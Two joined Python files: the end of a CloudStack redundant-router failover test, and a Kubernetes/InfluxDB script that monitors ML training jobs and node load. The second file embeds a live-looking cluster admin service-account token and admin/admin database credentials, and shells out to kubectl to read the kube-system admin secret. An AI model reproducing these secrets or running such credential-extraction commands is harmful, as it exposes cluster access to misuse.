self.debug("Rebooting the backup router")
try:
Router.reboot(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to reboot BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the Primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_05_stopBackupRvR_startInstance(self):
"""Test stop backup RVR and start instance
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stop router that is BACKUP.
# 6. listRouters in the account and in the network
# 7. deployVM in the user account in the created network
# 8. listRouters in the account and in the network
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
backup_router = routers[1]
else:
backup_router = routers[0]
self.debug("Stopping the backup router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate,
'UNKNOWN',
"Redundant state of the backup router\
should be UNKNOWN but is %s" %
routers[0].redundantstate)
# Spawn an instance in that network
vm_2 = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
vms = VirtualMachine.list(
self.apiclient,
id=vm_2.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List Vms should return a valid list"
)
vm = vms[0]
self.assertEqual(
vm.state,
"Running",
"Vm should be in running state after deployment"
)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
return
def updateNetwork(self, conn):
try:
self.network.update(
self.api_client,
networkofferingid=self.network_offering_for_update.id,
updateinsequence=True,
forced=True,
changecidr=False
)
except Exception as e:
conn.send("Failed to update network: %s due to %s"%(self.network.name, e))
conn.send("update Network Complete")
return
def get_primary_and_backupRouter(self):
retry = 4
primary_router = backup_router=None
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
if len(routers) < 2:
continue
if not (routers[0].redundantstate == 'PRIMARY' or routers[1].redundantstate == 'PRIMARY'):
continue;
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
break
else:
primary_router = routers[1]
backup_router = routers[0]
break
self.info("primary_router: %s, backup_router: %s" % (primary_router, backup_router))
return primary_router, backup_router
def chek_for_new_backupRouter(self,old_backup_router):
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
self.info("Checking if new router is getting created.")
self.info("old_backup_router:"+old_backup_router.name+" new_backup_router:"+backup_router.name)
while old_backup_router.name == backup_router.name:
self.debug("waiting for new router old router:"+backup_router.name)
retry = retry-1
if retry == 0:
break;
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("New router creation taking too long, timed out")
def wait_untill_router_stabilises(self):
retry=4
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
self.info("waiting untill state of the routers is stable")
if routers[0].redundantstate != 'UNKNOWN' and routers[1].redundantstate != 'UNKNOWN':
return
elif retry==0:
self.fail("timedout while waiting for routers to stabilise")
return
time.sleep(self.testdata["sleep"])
@attr(tags=["bharat"])
def test_06_updateVRs_in_sequence(self):
"""Test update network and check if VRs are updated in sequence
"""
# Steps to validate
# update network to a new offering
# check if the primary router is running while backup is starting.
# check if the backup is running while primary is starting.
# check if both the routers are running after the update is complete.
#clean up the network to make sure it is in proper state.
self.network.restart(self.apiclient,cleanup=True)
time.sleep(self.testdata["sleep"])
self.wait_untill_router_stabilises()
old_primary_router, old_backup_router = self.get_primary_and_backupRouter()
self.info("old_primary_router:"+old_primary_router.name+" old_backup_router"+old_backup_router.name)
#chek if the network is in correct state
self.assertEqual(old_primary_router.state, "Running", "The primary router is not running, network is not in a correct state to start the test")
self.assertEqual(old_backup_router.state, "Running", "The backup router is not running, network is not in a correct state to start the test")
worker, monitor = multiprocessing.Pipe()
worker_process = multiprocessing.Process(target=self.updateNetwork, args=(worker,))
worker_process.start()
if not worker_process.is_alive():
message = monitor.recv()
if "Complete" not in message:
self.fail(message)
self.info("Network update Started, the old backup router will get destroyed and a new router will be created")
self.chek_for_new_backupRouter(old_backup_router)
primary_router, new_backup_router=self.get_primary_and_backupRouter()
#the state of the primary router should be running. while backup is being updated
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
self.info("Old backup router:"+old_backup_router.name+" is destroyed and new router:"+new_backup_router.name+" got created")
#wait for the new backup to become primary.
retry = 4
while new_backup_router.name != primary_router.name:
retry = retry-1
if retry == 0:
break
time.sleep(self.testdata["sleep"])
self.info("wating for backup router to become primary router name:"+new_backup_router.name)
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("timed out while waiting for new backup router to change state to PRIMARY.")
#new backup router has become primary.
self.info("newly created router:"+new_backup_router.name+" has changed state to Primary")
self.info("old primary router:"+old_primary_router.name+"is destroyed")
#old primary will get destroyed and a new backup will be created.
#wait until new backup changes state from unknown to backup
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
while backup_router.redundantstate != 'BACKUP':
retry = retry-1
self.info("waiting for router:"+backup_router.name+" to change state to Backup")
if retry == 0:
break
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
if retry == 0:
self.fail("timed out while waiting for new backup rotuer to change state to PRIMARY.")
#the network update is complete.finally both the router should be running.
new_primary_router, new_backup_router=self.get_primary_and_backupRouter()
self.assertEqual(new_primary_router.state, "Running", "State of the primary router:"+new_primary_router.name+" is not running")
self.assertEqual(new_backup_router.state, "Running", "State of the backup router:"+new_backup_router.name+" is not running")
worker_process.join()
|
random_job3_saves.py
|
import task_submit
from task_submit import VGGTask,RESTask,RETask,DENTask,XCETask
import random
import kubernetes
import influxdb
import kubernetes
import yaml
import requests
from multiprocessing import Process
import multiprocessing
import urllib
import urllib3
import time
import numpy as np
np.set_printoptions(suppress=True) #设置print选项的参数
import os
import json
import math
import pandas as pd
import argparse
import random
import multiprocessing
import time
from pytz import UTC
from dateutil import parser
from datetime import datetime
import psutil
import socket
from max_heap import MaxHeap
import worker_queue
# from worker_queue import value_free_load,value_weight_load
from Global_client import Global_Influx
aToken = 'eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJhZG1pbi11c2VyLXRva2VuLTJ3dGRuIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXVzZXIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiI5YWE4ZTc4OS0zODM1LTExZWEtYWZlMi1mYTE2M2UzMzBlYWEiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06YWRtaW4tdXNlciJ9.qzHVo1KysWhnSAMwKAcaKLWkqOxBlSBr7qR4LtldusdM0Z9dDQVH2TMmtvmkBDyfqVKQttMmTGXDHhW-dOD9uJVn8w84zitd7eAgVCrHm2nhTMbsf2ZKH0DuU6t_SGYkyBWVIedMpZis-K2mzCjmSq5TAd67cMSCqGHQVMtjEsqpPyBeY_nrqgzWWwX3X3E0hHGk7CvICndFiqUeI9xKVluA-TdR6HzPXbaCIGAcvSHeIlc4GdhmDTJ47U4rQON3IL0dhC6Adom7c65I5pwBdYpfqkDhKld1o7ErhXS8Qhcv0BHhfuj-Bdn6MMsH7PXpH-7I5dxoKDVlTC-q7KV9EQ'
aTokenw = 'eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJhZG1pbi11c2VyLXRva2VuLTJ3dGRuIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXVzZXIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiI5YWE4ZTc4OS0zODM1LTExZWEtYWZlMi1mYTE2M2UzMzBlYWEiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06YWRtaW4tdXNlciJ9.qzHVo1KysWhnSAMwKAcaKLWkqOxBlSBr7qR4LtldusdM0Z9dDQVH2TMmtvmkBDyfqVKQttMmTGXDHhW-dOD9uJVn8w84zitd7eAgVCrHm2nhTMbsf2ZKH0DuU6t_SGYkyBWVIedMpZis-K2mzCjmSq5TAd67cMSCqGHQVMtjEsqpPyBeY_nrqgzWWwX3X3E0hHGk7CvICndFiqUeI9xKVluA-TdR6HzPXbaCIGAcvSHeIlc4GdhmDTJ47U4rQON3IL0dhC6Adom7c65I5pwBdYpfqkDhKld1o7ErhXS8Qhcv0BHhfuj-Bdn6MMsH7PXpH-7I5dxoKDVlTC-q7KV9EQ'
LOSSHOST = '192.168.128.21'
LOSSPORT = 12527
def parse():
parser = argparse.ArgumentParser(description="Node Monitor")
parser.add_argument('--save_path', default='/tfdata/nodedata', help='save path')
parser.add_argument('--database',default="NODEMESSAGE",help="save database")
parser.add_argument('--derivation',default=10,help='sampling rate')
parser.add_argument('--measurement',default="NODEMESSAGE",help="save measurement")
# parser.add_argument('--train_pg', action='store_true', help='whether train policy gradient')
# parser.add_argument('--train_dqn', action='store_true', help='whether train DQN')
# parser.add_argument('--test_pg', action='store_true', help='whether test policy gradient')
# parser.add_argument('--test_dqn', action='store_true', help='whether test DQN')
args = parser.parse_args()
return args
def update_token():
cacheData = os.popen(
"echo $(kubectl describe secret $(kubectl get secret -n kube-system | grep ^admin-user | awk '{print $1}') -n kube-system | grep -E '^token'| awk '{print $2}')").read()
cacheToken = cacheData[:-1]
newToken = str(cacheToken)
return newToken
def make_headers(Token):
text = 'Bearer ' + Token
headers = {'Authorization': text}
return headers
def catch_message(url):
global aToken
aToken = update_token()
headers = make_headers(aToken)
response = requests.get(url,headers=headers,verify=False)
res_json = response.json()
return res_json
def database_create(databasename):
database_list = Global_Influx.Client_all.get_list_database()
creating = True
for db in database_list:
dbl = list(db.values())
if databasename in dbl:
creating = False
break
if creating:
Global_Influx.Client_all.create_database(databasename)
# Global_Influx.Client_all.create_database(databasename)
def match_cpu(raw_data):
cache = raw_data[:-1]
matched_data = math.ceil(int(cache)/1e6)
return matched_data
def match_memory(raw_data):
cache = raw_data[:-2]
matched_data = math.ceil(int(cache)/1024)
return matched_data
def match_timestamp(raw_data):
EPOCH = UTC.localize(datetime.utcfromtimestamp(0))
timestamp = parser.parse(raw_data)
if not timestamp.tzinfo:
print("XXX")
timestamp = UTC.localize(timestamp)
s = (timestamp - EPOCH).total_seconds()
return int(s)
def generate_item(response,measurement):
node_cpu = {}
node_cpu['k8s-master'] = 32000
node_cpu['k8s-worker0'] = 24000
node_cpu['k8s-worker2'] = 24000
node_cpu['k8sworker1'] = 16000
node_cpu['k8s-worker3'] = 24000
node_cpu['k8s-worker4'] = 16000
node_cpu['k8s-worker5'] = 24000
node_memory = {}
node_memory['k8s-master'] = float(251 * 1024)
node_memory['k8s-worker0'] = float(94 * 1024)
node_memory['k8s-worker2'] = float(94 * 1024)
node_memory['k8sworker1'] = float(125 * 1024)
node_memory['k8s-worker3'] = float(94 * 1024)
node_memory['k8s-worker4'] = float(125 * 1024)
node_memory['k8s-worker5'] = float(94 * 1024)
points = []
# content = {}
timestamp = response['items'][0]['metadata']['creationTimestamp']
for item in response['items']:
content = {
'measurement': measurement,
'tags':{
"nodes": item['metadata']['name']
},
'fields': {
'cpu': match_cpu(item['usage']['cpu']),
'memory': match_memory(item['usage']['memory']),
'cpu_percent': float(match_cpu(item['usage']['cpu'])/node_cpu[item['metadata']['name']]),
'memory_percent': float(match_memory(item['usage']['memory']) / node_memory[item['metadata']['name']])
},
'time': match_timestamp(timestamp)
}
points.append(content)
return points
def DeletefromDB(Client,DatabaseName):
databases = Client.get_list_database()
for Cn in databases:
if DatabaseName in Cn.values():
Client.drop_database(DatabaseName)
break
class Node_mess(multiprocessing.Process):
def __init__(self,url,args,tasks,v1):
multiprocessing.Process.__init__(self)
self.url = url
self.args = args
self.derivation = args.derivation
self.time_mess = {}
self.cpu_mess = {}
self.memory_mess = {}
self.cpu_per = {}
self.memory_per = {}
self.node_cpu = {}
self.node_cpu['k8s-master'] = 32000
self.node_cpu['k8s-worker0'] = 24000
self.node_cpu['k8s-worker2'] = 24000
self.node_cpu['k8sworker1'] = 16000
self.node_cpu['k8s-worker3'] = 24000
self.node_cpu['k8s-worker4'] = 16000
self.node_cpu['k8s-worker5'] = 24000
self.node_memory = {}
self.node_memory['k8s-master'] = float(251 * 1024)
self.node_memory['k8s-worker0'] = float(94 * 1024)
self.node_memory['k8s-worker2'] = float(94 * 1024)
self.node_memory['k8sworker1'] = float(125 * 1024)
self.node_memory['k8s-worker3'] = float(94 * 1024)
self.node_memory['k8s-worker4'] = float(125 * 1024)
self.node_memory['k8s-worker5'] = float(94 * 1024)
# self.derivation = derivation
self.arg = args
self.tasks = tasks
self.v1 = v1
self.database = args.database
self.measurement = args.measurement
self.save_path = args.save_path
if not os.path.exists(self.arg.save_path):
os.makedirs(self.arg.save_path)
database_create(self.database)
self.client = influxdb.InfluxDBClient('192.168.128.10',port=8086,username='admin',password='admin',database=self.database)
#derivation
# def node_measurement(self,node_list):
# # Global_Influx.Client_all.get_list_measurements()
def run(self):
print(multiprocessing.current_process().pid)
print(os.getpid())
response = catch_message(self.url)
self.time_mess['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.cpu_mess['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.memory_mess['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.cpu_per['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
self.memory_per['creation'] = [response['items'][0]['metadata']['creationTimestamp']]
for item in response['items']:
self.time_mess[item['metadata']['name']] = [item['timestamp']]
self.cpu_mess[item['metadata']['name']] = [match_cpu(item['usage']['cpu'])]
self.memory_mess[item['metadata']['name']] = [match_memory(item['usage']['memory'])]
self.cpu_per[item['metadata']['name']] = [float(match_cpu(item['usage']['cpu'])/self.node_cpu[item['metadata']['name']])]
self.memory_per[item['metadata']['name']] = [float(match_memory(item['usage']['memory']) / self.node_memory[item['metadata']['name']])]
self.client.write_points(generate_item(response,self.measurement),'s',database=self.database)
time.sleep(self.derivation)
while True:
response = catch_message(self.url)
self.time_mess['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.cpu_mess['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.memory_mess['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.cpu_per['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
self.memory_per['creation'].append(response['items'][0]['metadata']['creationTimestamp'])
for item in response['items']:
self.time_mess[item['metadata']['name']].append(item['timestamp'])
self.cpu_mess[item['metadata']['name']].append(match_cpu(item['usage']['cpu']))
self.memory_mess[item['metadata']['name']].append(match_memory(item['usage']['memory']))
self.cpu_per[item['metadata']['name']].append(float(match_cpu(item['usage']['cpu'])/self.node_cpu[item['metadata']['name']]))
self.memory_per[item['metadata']['name']].append(float(match_memory(item['usage']['memory']) / self.node_memory[item['metadata']['name']]))
self.client.write_points(generate_item(response, self.measurement), 's', database=self.database)
if len(self.time_mess['creation'])%30==0 and len(self.time_mess['creation']) > 0:
data_frame = pd.DataFrame(self.time_mess)
data_frame.to_csv(self.save_path + '/' + 'struct.csv', mode='a+', index=False, sep=',')
print(self.cpu_mess)
print(len(self.cpu_mess))
for keyss in self.cpu_mess:
print(keyss+": "+str(len(self.cpu_mess[keyss])))
data_frame2 = pd.DataFrame(self.cpu_mess)
data_frame2.to_csv(self.save_path + '/' + 'node_cpu.csv', mode='a+', index=False, sep=',')
data_frame3 = pd.DataFrame(self.memory_mess)
data_frame3.to_csv(self.save_path + '/' + 'node_memory.csv', mode='a+', index=False, sep=',')
data_frame4 = pd.DataFrame(self.cpu_per)
data_frame4.to_csv(self.save_path + '/' + 'node_cpu_per.csv', mode='a+', index=False, sep=',')
data_frame5 = pd.DataFrame(self.memory_per)
data_frame5.to_csv(self.save_path + '/' + 'node_memory_per.csv', mode='a+', index=False, sep=',')
f1 = open('/tfdata/nodedata/node.json', 'r', encoding='utf-8')
res = f1.read()
a = json.loads(res)
f1.close()
node_layout = {}
node_list = [i.metadata.name for i in self.v1.list_node().items]
for node in node_list:
node_layout[node] = []
for ns in tasks['ns']:
tmp_layout = tasks['nslayout']
if tmp_layout[ns]:
pod_list = [i for i in self.v1.list_namespaced_pod(ns).items]
for pod in pod_list:
try:
node_layout[pod.spec.node_name].append(pod.metadata.name)
except Exception as e0:
print(e0)
a.append(node_layout)
f2 = open('/tfdata/nodedata/node.json', 'w', encoding='utf-8')
node_json = json.dumps(a, ensure_ascii=False, indent=4) # list转成json,字典转成字符串
f2.write(node_json)
f2.close()
for key in self.time_mess:
self.time_mess[key] = []
self.cpu_mess[key] = []
self.memory_mess[key] = []
self.memory_per[key] = []
self.cpu_per[key] = []
time.sleep(self.derivation)
def get_ns(v1):
ns_list = []
for i in v1.list_namespace().items:
ns_list.append(i.metadata.name)
return ns_list
# def get_layout():
def Monitor_job(tasks,lock,v1,jobs):
time.sleep(10)
while True:
if tasks['start'] == False:
break
ns_list = get_ns(v1)
print(ns_list)
if tasks['start'] == True and tasks['count'] == 0:
time.sleep(30)
pass
else:
for ns in tasks['ns']:
print(ns+'If in list:'+str(ns in ns_list))
if ns not in ns_list:
try_times = 10
while try_times > 0:
time.sleep(float(random.randint(5, 10)))
if ns in ns_list:
break
try_times=try_times-1
if try_times <=0 :
lock.acquire()
ns_tmp = tasks['ns']
ns_tmp.remove(ns)
tasks['ns'] = ns_tmp
is_layout = tasks['nslayout']
is_layout.pop(ns)
tasks['nslayout'] = is_layout
count_tmp = len(ns_tmp)
tasks['count'] = count_tmp
lock.release()
else:
# print(b[0].status.container_statuses[0].state.terminated.reason)
pod_status = [i.status.phase for i in v1.list_namespaced_pod(ns).items]
# if 'Running' in pod_status:
#
# time.sleep(5)
# lock.acquire()
# print("Select the loayout!")
# tmp_layout = tasks['nslayout']
# tmp_keys = list(tmp_layout.keys())
# if ns in tmp_keys and tmp_layout[ns]==False:
# tmp_layout_config = {}
# for i in v1.list_namespaced_pod(ns).items:
# tmp_layout_config[i.metadata.name] = i.spec.node_name
# fp = open('/tfdata/k8snfs/'+ns+'/layout.json', 'w', encoding='utf-8')
# # ensure_ascii:默认值True,如果dict内含有non-ASCII的字符,则会类似\uXXXX的显示数据,设置成False后,就能正常显示
# dicc_json = json.dumps(tmp_layout_config, ensure_ascii=False, indent=4) # 字典转成json,字典转成字符串
# fp.write(dicc_json)
# fp.close()
# tmp_layout[ns] = True
# tasks['nslayout'] = tmp_layout
# lock.release()
if 'Succeeded' in pod_status or 'Failed' in pod_status:
# # print(b[0].status.container_statuses[0].state.terminated.reason)
# pod_status = [i.status.phase for i in v1.list_namespaced_pod(ns).items]
# ['OOMKilled']
time.sleep(15)
try:
exit_reason = [i.status.container_statuses[0].state.terminated.reason for i in
v1.list_namespaced_pod(ns).items]
print(exit_reason)
exit_ict = {'reasons': exit_reason}
exit_path = '/tfdata/k8snfs/%s/exit_reason.json' % ns
exit_json = json.dumps(exit_ict, ensure_ascii=False, indent=4)
fw_exit = open(exit_path, 'w', encoding='utf-8')
fw_exit.write(exit_json)
fw_exit.close()
except Exception as e:
print(e)
time.sleep(10)
lock.acquire()
# job_tmp = tasks['job']
# job = job_tmp[ns]
# job.delete_tf()
# command = 'kubectl delete -f /tfdata/tfcnn/expjob/'+ns+'.yaml'
command = 'kubectl delete -f /tfdata/tfcnn/expjob/' + ns + '.yaml'
os.system(command)
v1.delete_namespace(ns)
ns_tmp = tasks['ns']
ns_tmp.remove(ns)
tasks['ns'] = ns_tmp
is_layout = tasks['nslayout']
is_layout.pop(ns)
for i in range(len(jobs)):
if jobs[i] == ns:
jobs.pop(i)
break
tasks['nslayout'] = is_layout
# job_tmp.pop(ns)
# tasks['job'] = job_tmp
tasks['count'] -= 1
lock.release()
time.sleep(5)
def make_time_query(time_base,mode=0):
if mode == 0:
time_query = (math.floor(time_base-1))
time_query_str = str(time_query)+'000000000'
else:
time_query = (math.ceil(time_base+1))
time_query_str = str(time_query)+'000000000'
return time_query_str
def catch_node_step_msg(jobs,job_name,tasks,lock,batch,flops,params,mode):
node_influx_client = influxdb.InfluxDBClient(host='192.168.128.10',username='admin',password='admin',database='NODEMESSAGE')
step_influx_client = influxdb.InfluxDBClient(host='192.168.128.10',username='admin',password='admin',database='PREDICT')
jieshu = False
lock.acquire()
for jo in jobs:
if jo == job_name:
job = reload_jobs(job_name,-1)
print('reload job success!')
break
lock.release()
count = 0
while True:
pod_status = [i.status.phase for i in job.v1.list_namespaced_pod(job_name).items]
run_result = pd.value_counts(pod_status)
run_result_dict = dict(run_result)
print(run_result_dict)
if 'Running' in pod_status and run_result_dict['Running'] == (job.ps_replicas + job.worker_replicas):
time.sleep(10)
lock.acquire()
print("Select the loayout!")
tmp_layout = tasks['nslayout']
tmp_keys = list(tmp_layout.keys())
if job_name in tmp_keys and tmp_layout[job_name] == False:
tmp_layout_config = {}
for i in job.v1.list_namespaced_pod(job_name).items:
tmp_layout_config[i.metadata.name] = i.spec.node_name
fp = open('/tfdata/k8snfs/' + job_name + '/layout.json', 'w', encoding='utf-8')
# ensure_ascii:默认值True,如果dict内含有non-ASCII的字符,则会类似\uXXXX的显示数据,设置成False后,就能正常显示
dicc_json = json.dumps(tmp_layout_config, ensure_ascii=False, indent=4) # 字典转成json,字典转成字符串
fp.write(dicc_json)
fp.close()
tmp_layout[job_name] = True
tasks['nslayout'] = tmp_layout
lock.release()
break
elif 'Succeeded' in pod_status or 'Failed' in pod_status:
jieshu = True
print("Exception exit! Pending Problem!")
return
elif not run_result_dict:
if count > 10:
jieshu = True
print("Exception exit! Creating Problem!")
return
count+=1
time.sleep(30)
else:
time.sleep(30)
job_measure = job.measure
print("job measure: %s" % job.measure)
pre_list = job_measure.split(' ')
measure_s = pre_list[0] + 'S' + pre_list[-1]
measure_load = pre_list[0]+'L'+pre_list[-1]
ns_name = job.name
tmp_creation = tasks['creation'][:]
if mode < 0:
time_base = tasks['creation'][-1]
else:
time_base = tasks['creation'][-1]
# time_avg = []
ns_layout = {}
# worker_num = 0
while True:
lock.acquire()
tmp_layout = tasks["nslayout"]
lock.release()
print("Get the layout config!")
if jieshu:
break
if tmp_layout[ns_name]:
layout_file = '/tfdata/k8snfs/%s/layout.json' % ns_name
layout_dict = load_config(layout_file)
layout_key = list(layout_dict.keys())
for layout_msg in layout_key:
if 'worker' in layout_msg:
idx = layout_msg[-1]
ns_key = 'worker'+idx
ns_layout[ns_key] = layout_dict[layout_msg]
# worker_num = worker_num+1
print(ns_layout)
break
else:
time.sleep(10)
# time_query = ((time_base - 1)* 1e9)
time_query_str = make_time_query(time_base,mode=0)
print('first time query: %s' % time_query_str)
res = step_influx_client.query(
"select * from " + measure_s + " where time >= " + time_query_str + " group by nodes order by asc limit 10")
keys = res.keys()
print('first query success!')
print(keys)
mana = 0
step_base = read_step_base(job.name)
step_high = step_base+1
while True:
# step_base = 0
print("%s try_time=%d" % (job_name,mana))
print(keys)
if jieshu:
break
if mana > 100:
jieshu = True
break
pod_status = [i.status.phase for i in job.v1.list_namespaced_pod(job_name).items]
if 'Succeeded' in pod_status or 'Failed' in pod_status:
break
if keys and len(keys) == job.worker_replicas:
print("Start to get load-run data")
node_list = [b['nodes'] for a, b in keys]
dic_msg = {}
for node in node_list:
for i in range(len(keys)):
_, no = keys[i]
if no['nodes'] == node:
dic_msg[node] = list(res[keys[i]])
print(dic_msg)
time_base_list = []
time_low_list = []
time_node_avg = {}
time_avg = []
step_base_list = []
for node in node_list:
time_low_list.append(int(match_timestamp(dic_msg[node][0]['time'])))
time_base_list.append(int(match_timestamp(dic_msg[node][-1]['time'])))
time_avg_list = [float(i['time_d']) for i in dic_msg[node]]
step_base_list.append(int(dic_msg[node][-1]['step']))
time_avg_node = np.mean(time_avg_list)
time_node_avg[node] = time_avg_node
time_avg.append(time_avg_node)
print(time_avg)
step_base = max(step_base_list)
write_step_base(job.name,step_base)
print("step base is %d" % step_base)
print(type(step_base))
time_low = math.floor(min(time_low_list)-5)
time_high = math.ceil(max(time_base_list)+10)
time_low_str = make_time_query(time_low,mode=0)
time_high_str = make_time_query(time_high,mode=1)
# result = self.influx_client.query("select * from "+"NODEMESSAGE"+" group by nodes order by desc limit 3")
load_result = node_influx_client.query("select * from NODEMESSAGE where time >= "+time_low_str+" and time <= "+time_high_str+" group by nodes order by asc")
total_worker_node_list = job.get_node_list()
result_keys = load_result.keys()
print(load_result)
worker_nodes = [i[-1]['nodes'] for i in result_keys]
print(worker_nodes)
worker_node_mg = [list(load_result[i]) for i in result_keys]
print(worker_node_mg)
if not worker_node_mg:
load_result = node_influx_client.query("select * from NODEMESSAGE where time >= "+time_low_str+" group by nodes order by asc")
total_worker_node_list = job.get_node_list()
result_keys = load_result.keys()
print(load_result)
worker_nodes = [i[-1]['nodes'] for i in result_keys]
print(worker_nodes)
worker_node_mg = [list(load_result[i]) for i in result_keys]
print(worker_node_mg)
cpu_use = {}
total_cpu_use = 0.0
total_memory_use = 0.0
total_cpu = 0
total_memory = 0
memory_use = {}
print(len(worker_node_mg))
print('start to write first points!')
try:
for i in range(len(worker_node_mg)):
cpu_use[worker_nodes[i]] = 0
memory_use[worker_nodes[i]] = 0
for j in range(len(worker_node_mg[i])):
print(len(worker_node_mg[i]))
try:
cpu_use[worker_nodes[i]] += worker_node_mg[i][j]['cpu']
print(cpu_use)
memory_use[worker_nodes[i]] += worker_node_mg[i][j]['memory']
except Exception as e0:
print(e0)
cpu_use[worker_nodes[i]] = (cpu_use[worker_nodes[i]] / len(worker_node_mg[i])) / job.node_cpu[
worker_nodes[i]]
memory_use[worker_nodes[i]] = (memory_use[worker_nodes[i]] / len(worker_node_mg[i])) / \
job.node_memory[worker_nodes[i]]
total_cpu_use += (cpu_use[worker_nodes[i]] * job.node_cpu[worker_nodes[i]])
total_cpu += job.node_cpu[worker_nodes[i]]
total_memory_use += (memory_use[worker_nodes[i]] * job.node_memory[worker_nodes[i]])
total_memory += job.node_memory[worker_nodes[i]]
print(cpu_use)
print(memory_use)
except Exception as e:
print(e)
total_cpu_use = total_cpu_use / total_cpu
total_memory_use = total_memory_use / total_memory
points = []
# # content = {}
# timestamp = response['items'][0]['metadata']['creationTimestamp']
for node in node_list:
content = {
'measurement': measure_load,
'tags':{
"nodes": node,
"workerpoint":ns_layout[node],
"task_id": job.task_id,
"runtimes":job.rtimes,
"retry":job.retry
},
'fields': {
'node_cpu': cpu_use[ns_layout[node]],
'node_memory': memory_use[ns_layout[node]],
'time_avg': time_node_avg[node],
'total_cpu': total_cpu_use,
'total_memory': total_memory_use,
